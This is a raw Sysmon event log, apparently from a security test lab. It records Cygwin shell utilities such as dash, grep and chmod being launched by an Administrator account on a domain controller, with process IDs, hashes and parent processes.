14:55:58.327{A8622C2F-53FE-6078-C00A-00000000AE01}6240C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053302Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.319{A8622C2F-53FE-6078-BF0A-00000000AE01}6336C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-BE0A-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053292Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.311{A8622C2F-53FE-6078-BE0A-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053280Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.303{A8622C2F-53FE-6078-BD0A-00000000AE01}4424C:\cygwin64\bin\tr.exe-----"C:\cygwin64\bin\tr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=65789252526C9B5F8A73D99D53C2CC58,SHA256=464DA547E4E2B9B5E5E3C7B4773820257AAA39BCF85318B5CE86443E6EA5F3C7,IMPHASH=CDDCB078A4D97440CAEF0552021BCA5C{A8622C2F-53FE-6078-BB0A-00000000AE01}5804C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.295{A8622C2F-53FE-6078-BC0A-00000000AE01}6076C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-BA0A-00000000AE01}4288C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053260Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.295{A8622C2F-53FE-6078-BB0A-00000000AE01}5804C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-B90A-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053250Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.287{A8622C2F-53FE-6078-BA0A-00000000AE01}4288C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-B90A-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053238Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.279{A8622C2F-53FE-6078-B90A-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053226Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.271{A8622C2F-53FE-6078-B80A-00000000AE01}5344C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FE-6078-B70A-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053216Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.264{A8622C2F-53FE-6078-B70A-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053204Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.255{A8622C2F-53FE-6078-B60A-00000000AE01}6808C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FE-6078-B50A-00000000AE01}5852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053194Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.247{A8622C2F-53FE-6078-B50A-00000000AE01}5852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053184Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.231{A8622C2F-53FE-6078-B40A-00000000AE01}6884C:\cygwin64\bin\find.exe-----"C:\cygwin64\bin\find.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C17DC689E2E9C2AF759E7A3046DE8F1D,SHA256=77371827DA82B14D29999F738B77F53053833BE5C0257DC85E8A091ABB662789,IMPHASH=58AC74B0A7539EFE91A9196817FF689C{A8622C2F-53FE-6078-B30A-00000000AE01}4696C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053174Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.224{A8622C2F-53FE-6078-B30A-00000000AE01}4696C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053162Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.216{A8622C2F-53FE-6078-B20A-00000000AE01}7016C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-B10A-00000000AE01}5996C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053152Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.209{A8622C2F-53FE-6078-B10A-00000000AE01}5996C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053142Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.635{A8622C2F-53FD-6078-680A-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052363Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.627{A8622C2F-53FD-6078-670A-00000000AE01}5996C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052351Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.619{A8622C2F-53FD-6078-660A-00000000AE01}5620C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052339Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.611{A8622C2F-53FD-6078-650A-00000000AE01}5332C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.602{A8622C2F-53FD-6078-640A-00000000AE01}5964C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052315Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.595{A8622C2F-53FD-6078-630A-00000000AE01}3912C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052303Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.587{A8622C2F-53FD-6078-620A-00000000AE01}6240C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052291Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.579{A8622C2F-53FD-6078-610A-00000000AE01}924C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052279Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.571{A8622C2F-53FD-6078-600A-00000000AE01}5220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052267Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.562{A8622C2F-53FD-6078-5F0A-00000000AE01}4300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052255Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.554{A8622C2F-53FD-6078-5E0A-00000000AE01}5404C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052243Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.547{A8622C2F-53FD-6078-5D0A-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052231Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.539{A8622C2F-53FD-6078-5C0A-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052219Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.531{A8622C2F-53FD-6078-5B0A-00000000AE01}5804C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052207Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.523{A8622C2F-53FD-6078-5A0A-00000000AE01}5116C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052195Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.515{A8622C2F-53FD-6078-590A-00000000AE01}6364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052183Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.507{A8622C2F-53FD-6078-580A-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.499{A8622C2F-53FD-6078-570A-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052157Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.491{A8622C2F-53FD-6078-560A-00000000AE01}3200C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052145Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.483{A8622C2F-53FD-6078-550A-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052133Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.475{A8622C2F-53FD-6078-540A-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052121Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.467{A8622C2F-53FD-6078-530A-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052109Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.459{A8622C2F-53FD-6078-520A-00000000AE01}2508C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052097Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.451{A8622C2F-53FD-6078-510A-00000000AE01}4604C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052085Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.443{A8622C2F-53FD-6078-500A-00000000AE01}5144C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052073Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.436{A8622C2F-53FD-6078-4F0A-00000000AE01}1628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052061Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 